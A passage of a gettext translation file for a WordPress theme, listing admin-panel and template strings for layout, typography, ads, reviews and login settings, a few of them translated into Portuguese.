msgid "Pre-Packaged" msgstr "" #: backend/panels/design.php:257 msgid "Prefix" msgstr "" #: backend/panels/optimized.php:74 msgid "Preload Font Icon" msgstr "" #: backend/panels/optimized.php:67 msgid "Preload Google Fonts" msgstr "" #: backend/panels/design.php:641 msgid "Prevent WordPress convert gif to a static image when uploading." msgstr "" #: backend/single-metaboxes.php:338 msgid "Preview Video" msgstr "" #: templates/parts.php:348 msgid "Previous" msgstr "" #: templates/single/templates.php:1016 msgid "Previous Article" msgstr "" #: templates/single/templates.php:564 msgid "Previous Page" msgstr "" #: backend/panels/woocommerce.php:188 msgid "Price Color" msgstr "" #: backend/panels/woocommerce.php:253 msgid "Price Font" msgstr "" #: backend/single-metaboxes.php:592 msgid "Price Offer" msgstr "" #: backend/panels/single-post.php:487 backend/single-metaboxes.php:267 msgid "Primary Category" msgstr "" #: backend/panels/heading.php:49 backend/panels/heading.php:134 msgid "Primary Heading Color" msgstr "" #: backend/panels/single-post.php:822 backend/panels/single-post.php:961 #: backend/panels/single-post.php:1099 backend/panels/single-post.php:1713 msgid "Print" msgstr "" #: backend/panels/privacy.php:14 msgid "Privacy Bar" msgstr "" #: backend/panels/privacy.php:7 msgid "Privacy Notice" msgstr "" #: backend/panels/woocommerce.php:237 msgid "Product Title Font" msgstr "" #: backend/panels/woocommerce.php:71 msgid "Products per Page" msgstr "" #: backend/panels/design.php:110 msgid "Published Date Icon" msgstr "" #: backend/panels/single-post.php:269 backend/panels/single-post.php:275 msgid "Quick View Info" msgstr "" #: templates/single/review-comment.php:89 msgid "Rate…" msgstr "" #: backend/panels/reaction.php:31 msgid "Reaction Heading" msgstr "" #: backend/panels/reaction.php:37 msgid "Reaction Items" msgstr "" #: backend/panels/reaction.php:23 msgid "Reaction Section" msgstr "" #: backend/configs.php:409 backend/panels/design.php:275 msgid "read (Reading Time)" msgstr "" #: templates/template-helpers.php:238 templates/template-helpers.php:382 msgid "Read More" msgstr "Leia mais" #: backend/category-settings.php:425 backend/panels/block-classic.php:106 #: backend/panels/block-grid.php:106 backend/panels/block-grid.php:271 #: backend/panels/block-grid.php:436 backend/panels/block-grid.php:609 #: backend/panels/block-grid.php:796 backend/panels/block-list.php:114 #: backend/panels/block-list.php:287 backend/panels/block-list.php:468 #: backend/panels/block-list.php:663 backend/panels/blog-pages.php:453 #: backend/panels/blog-pages.php:940 backend/panels/blog-pages.php:1354 #: backend/panels/blog-pages.php:1762 backend/panels/blog-pages.php:2254 #: backend/panels/bookmark.php:352 backend/panels/bookmark.php:800 #: backend/panels/design.php:535 backend/panels/typography.php:530 msgid "Read More Button" msgstr "" #: backend/panels/typography.php:538 msgid "Read More Font" msgstr "" #: backend/panels/design.php:549 msgid "Read More Icon" msgstr "" #: backend/panels/design.php:543 msgid "Read More Label" msgstr "" #: backend/panels/single-post.php:1564 msgid "Reading Font Resizer" msgstr "" #: backend/panels/single-post.php:1736 backend/panels/single-post.php:1745 msgid "Reading Indicator" msgstr "" #: backend/panels/bookmark.php:88 backend/panels/bookmark.php:106 #: templates/header/templates.php:710 msgid "Reading List" msgstr "" #: backend/panels/bookmark.php:98 msgid "Reading List Header" msgstr "" #: backend/panels/design.php:160 msgid "Reading Speed" msgstr "" #: backend/panels/single-post.php:661 backend/panels/single-post.php:667 msgid "Reading Time" msgstr "" #: backend/panels/design.php:138 msgid "Reading Time Meta Icon" msgstr "" #: templates/single/templates.php:1485 msgid "Reading:" msgstr "Leitura:" #: templates/blog.php:497 msgid "Ready to publish your first post?" msgstr "" #: templates/blog.php:17 #, php-format msgid "" "Ready to publish your first post? Get started here." msgstr "" #: backend/class-tgm-plugin-activation.php:2370 backend/panels/bookmark.php:502 msgid "Recommended" msgstr "" #: backend/panels/bookmark.php:520 msgid "Recommended for You" msgstr "" #: backend/panels/bookmark.php:512 msgid "Recommended Heading" msgstr "" #: backend/panels/design.php:315 msgid "Recommended select the top position if you have people images." msgstr "" #: backend/panels/single-post.php:777 backend/panels/single-post.php:916 #: backend/panels/single-post.php:1054 backend/panels/single-post.php:1681 #: templates/parts.php:639 msgid "Reddit" msgstr "" #: backend/panels/socials.php:128 msgid "Reddit URL " msgstr "" #: backend/panels/header.php:527 backend/panels/login.php:95 msgid "Redirect links should be inner links." msgstr "" #: backend/panels/login.php:93 msgid "Redirect Settings" msgstr "" #: backend/panels/bookmark.php:56 msgid "Redirect to Login for Guest Users" msgstr "" #: backend/panels/login.php:104 msgid "Redirect to this link after logged in." msgstr "" #: backend/panels/header.php:619 backend/panels/login.php:112 msgid "Redirect to this link after successful logout." msgstr "" #: backend/panels/login.php:58 msgid "Redirect to this link when clicking on the logo." msgstr "" #: backend/panels/dark-mode.php:36 msgid "Reduce the featured image opacity when enabled the dark mode." msgstr "" #: backend/panels/sidebar.php:15 msgid "" "Refresh your browser after creating new sidebars to update your changes." msgstr "" #: templates/popup.php:206 msgid "Register" msgstr "" #: backend/panels/single-post.php:1249 msgid "Related & Popular" msgstr "" #: backend/panels/single-post.php:1304 msgid "Related Heading" msgstr "" #: backend/panels/amp.php:222 backend/panels/single-post.php:1290 #: backend/panels/single-post.php:1296 msgid "Related Section" msgstr "" #: backend/panels/single-post.php:1266 msgid "Related Shortcode" msgstr "" #: bookmark/template-helpers.php:30 templates/entry.php:286 msgid "Remove" msgstr "Remover" #: backend/panels/amp.php:69 msgid "Remove Footer Switcher" msgstr "" #: backend/panels/amp.php:70 msgid "Remove the \"Exit Mobile Version\" link at the footer." msgstr "" #: bookmark/bookmark.php:56 msgid "Removed from reading list" msgstr "" #: backend/configs.php:426 msgid "Replace for Entry Meta" msgstr "" #: backend/class-tgm-plugin-activation.php:2367 msgid "Required" msgstr "" #: backend/class-tgm-plugin-activation.php:2421 msgid "Required Update not Available" msgstr "" #: backend/class-tgm-plugin-activation.php:2424 msgid "Requires Update" msgstr "" #: templates/header/templates.php:758 msgid "Resizer" msgstr "Redimensionador" #: backend/category-settings.php:465 backend/panels/block-classic.php:129 #: backend/panels/block-grid.php:129 backend/panels/block-grid.php:294 #: backend/panels/block-grid.php:459 backend/panels/block-grid.php:632 #: backend/panels/block-grid.php:819 backend/panels/block-list.php:137 #: backend/panels/block-list.php:310 backend/panels/block-list.php:491 #: backend/panels/block-list.php:686 backend/panels/blog-pages.php:490 #: backend/panels/blog-pages.php:977 backend/panels/blog-pages.php:1391 #: backend/panels/blog-pages.php:1799 backend/panels/blog-pages.php:2291 #: backend/panels/bookmark.php:389 backend/panels/bookmark.php:837 msgid "Responsive - Hide Entry Category" msgstr "" #: backend/category-settings.php:495 backend/panels/block-classic.php:155 #: backend/panels/block-grid.php:155 backend/panels/block-grid.php:320 #: backend/panels/block-grid.php:485 backend/panels/block-grid.php:658 #: backend/panels/block-grid.php:845 backend/panels/block-list.php:163 #: backend/panels/block-list.php:336 backend/panels/block-list.php:517 #: backend/panels/block-list.php:712 backend/panels/blog-pages.php:520 #: backend/panels/blog-pages.php:1007 backend/panels/blog-pages.php:1421 #: backend/panels/blog-pages.php:1829 backend/panels/blog-pages.php:2321 #: backend/panels/bookmark.php:411 backend/panels/bookmark.php:867 msgid "Responsive - Hide Excerpt" msgstr "" #: backend/panels/general.php:48 msgid "Restore/Backup" msgstr "" #: backend/panels/general.php:55 msgid "Restore/Backup Theme Options" msgstr "" #: backend/panels/logo.php:62 msgid "Retina Main Logo" msgstr "" #: templates/blog.php:22 msgid "Return to Home" msgstr "" #: templates/blog.php:505 templates/page.php:145 msgid "Return to Homepage" msgstr "Voltar a página inicial" #: backend/class-tgm-plugin-activation.php:397 backend/install-plugins.php:80 msgid "Return to Required Plugins Installer" msgstr "" #: backend/class-tgm-plugin-activation.php:398 #: backend/class-tgm-plugin-activation.php:920 #: backend/class-tgm-plugin-activation.php:2627 #: backend/class-tgm-plugin-activation.php:3674 msgid "Return to the Dashboard" msgstr "" #: backend/single-metaboxes.php:466 msgid "Review" msgstr "" #: backend/panels/single-post.php:1156 msgid "Review & Rating" msgstr "" #: templates/single/review-comment.php:43 msgid "Review Closed!" msgstr "" #: backend/single-metaboxes.php:534 msgid "Review Image" msgstr "" #: backend/category-settings.php:373 backend/panels/block-classic.php:58 #: backend/panels/block-grid.php:58 backend/panels/block-grid.php:223 #: backend/panels/block-grid.php:388 backend/panels/block-grid.php:561 #: backend/panels/block-grid.php:748 backend/panels/block-list.php:66 #: backend/panels/block-list.php:239 backend/panels/block-list.php:420 #: backend/panels/block-list.php:615 backend/panels/blog-pages.php:392 #: backend/panels/blog-pages.php:879 backend/panels/blog-pages.php:1293 #: backend/panels/blog-pages.php:1701 backend/panels/blog-pages.php:2193 #: backend/panels/bookmark.php:291 backend/panels/bookmark.php:739 msgid "Review Meta" msgstr "" #: backend/panels/block-classic.php:66 backend/panels/block-grid.php:66 #: backend/panels/block-grid.php:231 backend/panels/block-grid.php:396 #: backend/panels/block-grid.php:569 backend/panels/block-grid.php:756 #: backend/panels/block-list.php:74 backend/panels/block-list.php:247 #: backend/panels/block-list.php:428 backend/panels/block-list.php:623 #: backend/panels/blog-pages.php:400 backend/panels/blog-pages.php:887 #: backend/panels/blog-pages.php:1301 backend/panels/blog-pages.php:1709 #: backend/panels/blog-pages.php:2201 backend/panels/bookmark.php:299 #: backend/panels/bookmark.php:747 msgid "Review Meta Description" msgstr "" #: backend/single-metaboxes.php:499 msgid "Review Overview" msgstr "" #: backend/single-metaboxes.php:870 msgid "Review Schema Markup" msgstr "" #: backend/panels/color.php:132 msgid "Review Star Color" msgstr "" #: backend/panels/woocommerce.php:204 msgid "Review Start Color" msgstr "" #: backend/single-metaboxes.php:496 msgid "Review Title" msgstr "" #: backend/single-metaboxes.php:503 msgid "Review Type" msgstr "" #: backend/configs.php:181 backend/configs.php:545 backend/configs.php:824 #: backend/panels/login.php:42 msgid "Right" msgstr "" #: backend/panels/design.php:665 backend/panels/design.php:672 msgid "Round Corner" msgstr "" #: templates/parts.php:651 msgid "Rss" msgstr "" #: backend/panels/socials.php:152 msgid "Rss URL " msgstr "" #: backend/panels/design.php:305 msgid "" "Run regenerate thumbnail if you add/remove crop sizes. Please read " "documentation for further information." msgstr "" #: backend/panels/reaction.php:43 msgid "Sad" msgstr "" #: backend/panels/woocommerce.php:220 msgid "Sale Icon Background" msgstr "" #: backend/panels/single-post.php:1352 backend/panels/single-post.php:1449 msgid "Same Categories" msgstr "" #: backend/panels/single-post.php:1351 msgid "Same Tags" msgstr "" #: backend/panels/single-post.php:1350 msgid "Same Tags & Categories" msgstr "" #: bookmark/template-helpers.php:29 msgid "Save it" msgstr "Salve isso" #: backend/single-metaboxes.php:509 msgid "Score (1 > 10)" msgstr "" #: backend/single-metaboxes.php:526 msgid "Score (1 > 10) or Rating (1 > 5)" msgstr "" #: backend/panels/ads.php:101 backend/panels/ads.php:290 msgid "Script" msgstr "" #: backend/panels/ads.php:130 backend/panels/ads.php:319 msgid "Script - Ad Size" msgstr "" #: backend/panels/ads.php:122 backend/panels/ads.php:311 msgid "Script - Ad/Adsense Code" msgstr "" #: backend/panels/ads.php:141 backend/panels/ads.php:330 msgid "Script - Size on Desktop" msgstr "" #: backend/panels/ads.php:157 backend/panels/ads.php:346 msgid "Script - Size on Mobile" msgstr "" #: backend/panels/ads.php:149 backend/panels/ads.php:338 msgid "Script - Size on Tablet" msgstr "" #: backend/panels/ads.php:116 backend/panels/ads.php:305 msgid "Script Settings" msgstr "" #: backend/panels/newsletter.php:96 msgid "Scroll Distance" msgstr "" #: backend/panels/blog-pages.php:1886 backend/panels/header.php:190 #: searchform.php:18 templates/header/templates.php:345 templates/parts.php:477 msgid "Search" msgstr "Buscar" #: templates/header/templates.php:349 templates/parts.php:485 msgid "search" msgstr "buscar" #: templates/parts.php:474 msgid "Search and hit enter..." msgstr "" #: backend/panels/blog-pages.php:1895 msgid "Search Filter" msgstr "" #: searchform.php:14 msgid "Search for:" msgstr "" #: backend/panels/blog-pages.php:2418 msgid "Search Form" msgstr "" #: backend/panels/blog-pages.php:1961 msgid "Search Header" msgstr "" #: backend/panels/header.php:187 msgid "Search Heading" msgstr "" #: backend/panels/general.php:36 searchform.php:9 templates/parts.php:480 msgid "Search Headlines, News..." msgstr "" #: templates/blog.php:232 #, php-format msgid "Search Results for: %s" msgstr "Resultados da busca por: %s" #: templates/single/templates.php:1587 msgid "Section" msgstr "" #: backend/panels/ads.php:221 msgid "Section Background" msgstr "" #: backend/panels/bookmark.php:111 backend/panels/bookmark.php:454 msgid "Section Description" msgstr "" #: backend/panels/bookmark.php:104 backend/panels/bookmark.php:447 #: backend/panels/bookmark.php:518 msgid "Section Heading" msgstr "" #: backend/mega-menu.php:204 backend/panels/header.php:141 msgid "Section Width" msgstr "" #: backend/panels/footer.php:82 msgid "" "Select \"Use Ruby Template\" under the \"Footer Widgets Layout\" setting if " "you use Ruby Template shortcode." msgstr "" #: backend/panels/header.php:43 msgid "" "Select \"Use Ruby Template\" under the \"Global Header Style\" setting if " "you use Ruby Template shortcode." msgstr "" #: backend/panels/heading.php:75 backend/panels/heading.php:160 msgid "Select a accent color for the heading in the dark mode." msgstr "" #: backend/panels/heading.php:58 backend/panels/heading.php:143 msgid "Select a accent color for the heading." msgstr "" #: backend/panels/header-style.php:219 backend/panels/header-style.php:508 #: backend/panels/header-style.php:774 msgid "Select a accent color when hovering in the dark mode." msgstr "" #: backend/panels/header-style.php:141 backend/panels/header-style.php:285 #: backend/panels/header-style.php:429 backend/panels/header-style.php:696 msgid "Select a accent color when hovering." msgstr "" #: backend/panels/ads.php:98 msgid "Select a ad type for displaying in the top of the website." msgstr "" #: backend/panels/ads.php:286 msgid "Select a ad type for displaying inside the single post content." msgstr "" #: backend/panels/ads.php:417 msgid "Select a align style for the adverts." msgstr "" #: backend/single-metaboxes.php:378 msgid "" "Select a audio layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/woocommerce.php:229 msgid "Select a background color for the \"Add to Cart\" button." msgstr "" #: backend/panels/header.php:483 msgid "Select a background color for the collapse section in the dark mode." msgstr "" #: backend/panels/header.php:430 msgid "Select a background color for the collapse section." msgstr "" #: backend/panels/header.php:463 msgid "" "Select a background color for the mobile navigation bar and quick view " "mobile menu in the dark mode." msgstr "" #: backend/panels/header.php:409 msgid "" "Select a background color for the mobile navigation bar and quick view " "mobile menu." msgstr "" #: backend/panels/header-style.php:192 backend/panels/header-style.php:481 #: backend/panels/header-style.php:747 msgid "" "Select a background color for the navigation bar of this header in the dark " "mode." msgstr "" #: backend/panels/header-style.php:113 backend/panels/header-style.php:401 #: backend/panels/header-style.php:668 msgid "Select a background color for the navigation bar of this header." msgstr "" #: backend/panels/ads.php:537 msgid "" "Select a background color for the slide up toggle button when not activated." msgstr "" #: backend/panels/header-style.php:228 backend/panels/header-style.php:517 #: backend/panels/header-style.php:783 msgid "" "Select a background color for the sub menu and other dropdown sections of " "this header in the dark mode." msgstr "" #: backend/panels/header-style.php:150 backend/panels/header-style.php:438 #: backend/panels/header-style.php:705 msgid "" "Select a background color for the sub menu and other dropdown sections of " "this header." msgstr "" #: backend/panels/single-post.php:1762 msgid "Select a background color for this bar." msgstr "" #: backend/panels/woocommerce.php:221 msgid "Select a background color value for the sale icon." msgstr "" #: backend/panels/color.php:103 msgid "" "Select a background for the dark mode icon (Moon icon) of the dark mode " "switcher button to fit with the main navigation color." msgstr "" #: backend/panels/footer.php:41 msgid "Select a background for the footer in the dark mode: image, color, etc" msgstr "" #: backend/panels/footer.php:31 msgid "Select a background for the footer: image, color, etc" msgstr "" #: backend/panels/ads.php:230 msgid "Select a background for this ad section in the dark mode." msgstr "" #: backend/panels/ads.php:222 msgid "Select a background for this ad section." msgstr "" #: backend/panels/ads.php:507 msgid "Select a background for this section in the dark mode." msgstr "" #: backend/panels/ads.php:501 msgid "Select a background for this section." msgstr "" #: backend/panels/blog-pages.php:1493 msgid "Select a background style for the archive header." msgstr "" #: backend/panels/blog-pages.php:1085 msgid "Select a background style for the author header." msgstr "" #: backend/category-settings.php:93 backend/panels/blog-pages.php:91 msgid "Select a background style for this category header." msgstr "" #: backend/panels/bookmark.php:134 backend/panels/bookmark.php:484 msgid "Select a background style for this heading." msgstr "" #: backend/panels/block-grid.php:527 backend/panels/block-grid.php:714 #: backend/panels/block-list.php:378 backend/panels/block-list.php:573 msgid "Select a box style for the post listing." msgstr "" #: backend/panels/color.php:124 msgid "Select a color for post excerpt text." msgstr "" #: backend/panels/block-list.php:532 backend/panels/block-list.php:727 msgid "" "Select a color for the background or border style in the dark mode or light " "scheme mode." msgstr "" #: backend/panels/block-grid.php:680 backend/panels/block-grid.php:867 msgid "Select a color for the background or border style in the dark mode." msgstr "" #: backend/panels/block-grid.php:673 backend/panels/block-grid.php:860 #: backend/panels/block-list.php:525 backend/panels/block-list.php:720 msgid "Select a color for the background or border style." msgstr "" #: backend/panels/color.php:141 msgid "Select a color for the breadcrumb bar." msgstr "" #: backend/panels/single-post.php:254 msgid "Select a color for the hyperlink underline in the dark mode." msgstr "" #: backend/panels/single-post.php:246 msgid "" "Select a color for the hyperlink underline. Leave blank to set as the global " "color." msgstr "" #: backend/panels/color.php:95 msgid "" "Select a color for the light mode icon (Sun icon) of the dark mode switcher " "button to fit with the main navigation color." msgstr "" #: backend/panels/login.php:80 msgid "Select a color for the login screen." msgstr "" #: backend/panels/ads.php:521 msgid "" "Select a color for the slide up toggle button when activated in the dark " "mode." msgstr "" #: backend/panels/ads.php:513 msgid "Select a color for the slide up toggle button when activated." msgstr "" #: backend/panels/ads.php:529 msgid "Select a color for the slide up toggle button when not activated." msgstr "" #: backend/panels/privacy.php:65 msgid "Select a color for the text in the dark mode." msgstr "" #: backend/panels/privacy.php:49 msgid "Select a color for the text." msgstr "" #: backend/panels/privacy.php:57 msgid "Select a color for this box background in the dark mode." msgstr "" #: backend/panels/privacy.php:41 msgid "Select a color for this box background." msgstr "" #: backend/panels/socials.php:199 backend/panels/socials.php:226 #: backend/panels/socials.php:253 msgid "Select a color for this social icon." msgstr "" #: backend/panels/single-post.php:227 msgid "Select a color value for post hyperlinks in the dark mode." msgstr "" #: backend/panels/single-post.php:219 msgid "Select a color value for post hyperlinks." msgstr "" #: backend/panels/design.php:516 msgid "" "Select a color value for the audio icon. This setting will not apply to " "bottom right layout." msgstr "" #: backend/panels/design.php:508 msgid "" "Select a color value for the gallery icon. This setting will not apply to " "bottom right layout" msgstr "" #: backend/panels/single-post.php:235 msgid "Select a color value for the post hyperlinks." msgstr "" #: backend/panels/woocommerce.php:197 msgid "Select a color value for the product price in the dark mode." msgstr "" #: backend/panels/woocommerce.php:189 msgid "Select a color value for the product price." msgstr "" #: backend/panels/color.php:133 msgid "Select a color value for the star icons." msgstr "" #: backend/panels/woocommerce.php:213 msgid "Select a color value for the stars review in the dark mode." msgstr "" #: backend/panels/woocommerce.php:205 msgid "Select a color value for the stars review." msgstr "" #: backend/panels/design.php:499 msgid "" "Select a color value for the video icon. This setting will not apply to " "bottom right layout" msgstr "" #: backend/panels/newsletter.php:72 msgid "Select a cover image for the box." msgstr "" #: backend/single-metaboxes.php:244 msgid "" "Select a crop size for the featured image in case you would like to control " "the size." msgstr "" #: backend/category-settings.php:329 msgid "" "Select a crop size for the featured image to displaying in this category." msgstr "" #: backend/panels/woocommerce.php:254 msgid "Select a custom font for the product price." msgstr "" #: backend/panels/woocommerce.php:238 msgid "Select a custom font for the product title." msgstr "" #: backend/panels/ads.php:131 backend/panels/ads.php:320 msgid "Select a custom size for this ad if you use adsense ad units." msgstr "" #: backend/panels/color.php:58 msgid "" "Select a dark accent color for your website, This setting apply to single " "header background, gradient colors." msgstr "" #: backend/panels/color.php:87 msgid "" "Select a dark solid background for the dark mode. Leave blank to set it as " "the default." msgstr "" #: backend/panels/single-post.php:1188 msgid "Select a default featured image for the review box." msgstr "" #: backend/panels/heading.php:41 msgid "" "Select a default heading layout for the archives and Elementor blocks for " "your website." msgstr "" #: backend/panels/single-post.php:45 msgid "Select a default layout for the single post pages." msgstr "" #: backend/panels/single-post.php:1165 msgid "Select a default review type for your website." msgstr "" #: backend/panels/design.php:443 msgid "" "Select a effect for the sliders. This setting will be not available for the " "carousel mode." msgstr "" #: backend/panels/design.php:266 msgid "" "Select a fallback meta for displaying when if the post does not have custom " "meta value." msgstr "" #: backend/panels/block-classic.php:32 backend/panels/block-grid.php:32 #: backend/panels/block-grid.php:197 backend/panels/block-grid.php:362 #: backend/panels/block-grid.php:535 backend/panels/block-grid.php:722 #: backend/panels/block-list.php:32 backend/panels/block-list.php:205 #: backend/panels/block-list.php:386 backend/panels/block-list.php:581 #: backend/panels/blog-pages.php:350 backend/panels/blog-pages.php:837 #: backend/panels/blog-pages.php:1251 backend/panels/blog-pages.php:1659 #: backend/panels/blog-pages.php:2151 backend/panels/bookmark.php:250 #: backend/panels/bookmark.php:698 msgid "Select a featured image size to optimize with the columns setting." msgstr "" #: backend/panels/typography.php:654 backend/panels/typography.php:1129 msgid "" "Select a font size (px) for buttons on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:661 backend/panels/typography.php:1136 msgid "" "Select a font size (px) for buttons on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:508 msgid "" "Select a font size (px) for entry meta info on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:515 msgid "" "Select a font size (px) for entry meta info on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:611 msgid "" "Select a font size (px) for input and textarea on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:618 msgid "" "Select a font size (px) for input and textarea on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:60 msgid "" "Select a font size (px) for the body on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:53 msgid "" "Select a font size (px) for the body on the mobile device (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:871 msgid "" "Select a font size (px) for the breadcrumbs bar on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:878 msgid "" "Select a font size (px) for the breadcrumbs bar on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:442 msgid "" "Select a font size (px) for the entry category element on mobile devices " "(max screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:449 msgid "" "Select a font size (px) for the entry category element on tablet devices " "(max screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:99 msgid "" "Select a font size (px) for the excerpt on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:106 msgid "" "Select a font size (px) for the excerpt on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:92 msgid "" "Select a font size (px) for the excerpt. Leave this option blank to set the " "default value." msgstr "" #: backend/panels/typography.php:1057 msgid "" "Select a font size (px) for the heading block on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:1064 msgid "" "Select a font size (px) for the heading block on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/category-settings.php:442 backend/panels/blog-pages.php:469 #: backend/panels/blog-pages.php:956 backend/panels/blog-pages.php:1370 #: backend/panels/blog-pages.php:1778 backend/panels/blog-pages.php:2270 #: backend/panels/bookmark.php:368 backend/panels/bookmark.php:816 msgid "" "Select a font size (px) for the post title in the desktop device. Leave " "blank to set it as the default." msgstr "" #: backend/category-settings.php:458 backend/panels/blog-pages.php:483 #: backend/panels/blog-pages.php:970 backend/panels/blog-pages.php:1384 #: backend/panels/blog-pages.php:1792 backend/panels/blog-pages.php:2284 #: backend/panels/bookmark.php:382 backend/panels/bookmark.php:830 msgid "" "Select a font size (px) for the post title in the mobile device. Leave blank " "to set it as the default." msgstr "" #: backend/category-settings.php:450 backend/panels/blog-pages.php:476 #: backend/panels/blog-pages.php:963 backend/panels/blog-pages.php:1377 #: backend/panels/blog-pages.php:1785 backend/panels/blog-pages.php:2277 #: backend/panels/bookmark.php:375 backend/panels/bookmark.php:823 msgid "" "Select a font size (px) for the post title in the table devices. Leave blank " "to set it as the default." msgstr "" #: backend/panels/typography.php:556 msgid "" "Select a font size (px) for the readmore button on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:563 msgid "" "Select a font size (px) for the readmore button on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:730 msgid "" "Select a font size (px) for the single headline on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:737 msgid "" "Select a font size (px) for the single headline on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:723 #, php-format msgid "" "Select a font size (px) for the single headline or displaying in 66.67% of " "the site width." msgstr "" #: backend/panels/typography.php:787 msgid "" "Select a font size (px) for the single tagline on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:794 msgid "" "Select a font size (px) for the single tagline on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:780 #, php-format msgid "" "Select a font size (px) for the single tagline or displaying in 66.67% of " "the site width." msgstr "" #: backend/panels/typography.php:148 backend/panels/typography.php:197 #: backend/panels/typography.php:246 backend/panels/typography.php:295 #: backend/panels/typography.php:344 backend/panels/typography.php:393 msgid "" "Select a font size (px) for this heading tag on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:155 backend/panels/typography.php:204 #: backend/panels/typography.php:253 backend/panels/typography.php:302 #: backend/panels/typography.php:351 backend/panels/typography.php:400 msgid "" "Select a font size (px) for this heading tag on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/single-post.php:206 msgid "Select a font style for the post hyperlinks." msgstr "" #: backend/panels/header.php:150 backend/panels/header.php:382 msgid "Select a footer menu to display at the bottom of this section." msgstr "" #: backend/single-metaboxes.php:425 msgid "" "Select a gallery layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/color.php:37 msgid "Select a global color in the dark mode." msgstr "" #: backend/panels/color.php:29 msgid "" "Select a global color, This setting apply to all links, menu, category " "overlays, main page and many contrasting elements." msgstr "" #: backend/panels/single-post.php:104 msgid "Select a global layout for the audio post format." msgstr "" #: backend/panels/single-post.php:133 msgid "Select a global layout for the gallery post format." msgstr "" #: backend/panels/single-post.php:67 msgid "Select a global layout for the video post format." msgstr "" #: backend/panels/page.php:31 msgid "Select a header style for the single page." msgstr "" #: backend/category-settings.php:57 msgid "Select a header style for this category." msgstr "" #: backend/panels/heading.php:105 msgid "Select a heading layout for the footer column widgets." msgstr "" #: backend/category-settings.php:190 backend/panels/blog-pages.php:212 #: backend/panels/bookmark.php:525 backend/panels/single-post.php:1312 msgid "Select a heading layout for the heading." msgstr "" #: backend/panels/heading.php:96 msgid "Select a heading layout for the sidebar widgets." msgstr "" #: backend/category-settings.php:31 backend/panels/design.php:45 msgid "" "Select a highlight color for the entry category to display in the post " "listing." msgstr "" #: backend/panels/single-post.php:516 msgid "Select a HTML tag for the single tagline to optimize your SEO settings." msgstr "" #: backend/panels/single-post.php:530 msgid "Select a HTML tag for the single tagline." msgstr "" #: backend/panels/bookmark.php:533 backend/panels/single-post.php:1320 msgid "Select a HTML tag for this heading." msgstr "" #: backend/category-settings.php:198 backend/panels/blog-pages.php:220 msgid "" "Select a HTML tag for this heading. Leave this option blank to set the " "default." msgstr "" #: backend/single-metaboxes.php:220 msgid "Select a HTML tag for this tagline." msgstr "" #: backend/panels/single-post.php:1337 msgid "Select a layout for the blog listing." msgstr "" #: backend/panels/block-classic.php:40 backend/panels/block-grid.php:40 #: backend/panels/block-grid.php:205 backend/panels/block-grid.php:370 #: backend/panels/block-grid.php:543 backend/panels/block-grid.php:730 #: backend/panels/block-list.php:48 backend/panels/block-list.php:221 #: backend/panels/block-list.php:402 backend/panels/block-list.php:597 #: backend/panels/blog-pages.php:365 backend/panels/blog-pages.php:852 #: backend/panels/blog-pages.php:1266 backend/panels/blog-pages.php:1674 #: backend/panels/blog-pages.php:2166 backend/panels/bookmark.php:265 #: backend/panels/bookmark.php:713 msgid "Select a layout for the entry category to display in the post listing." msgstr "" #: backend/panels/footer.php:91 msgid "Select a layout for the footer widget area." msgstr "" #: backend/panels/header.php:341 msgid "Select a layout for the mobile header." msgstr "" #: backend/panels/header.php:548 msgid "Select a layout for the sign in trigger button." msgstr "" #: backend/single-metaboxes.php:723 msgid "Select a layout for the table of contents of this post." msgstr "" #: backend/panels/table-contents.php:111 msgid "Select a layout for the table of contents." msgstr "" #: backend/panels/page.php:43 backend/panels/single-post.php:183 #: backend/single-metaboxes.php:70 msgid "Select a max-width for the content area without sidebar." msgstr "" #: backend/panels/footer.php:200 msgid "Select a menu to display in the footer copyright bar." msgstr "" #: backend/panels/newsletter.php:94 msgid "Select a mode to display the newsletter popup." msgstr "" #: backend/panels/single-post.php:1368 msgid "Select a pagination type for the related section." msgstr "" #: backend/panels/block-list.php:40 backend/panels/block-list.php:213 #: backend/panels/block-list.php:394 backend/panels/block-list.php:589 msgid "Select a position for the featured image. " msgstr "" #: backend/panels/login.php:37 msgid "Select a position for the login form." msgstr "" #: backend/single-metaboxes.php:89 msgid "" "Select a position for the sidebar of this page. It will override on the " "default settings in the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:448 msgid "" "Select a position for the sidebar 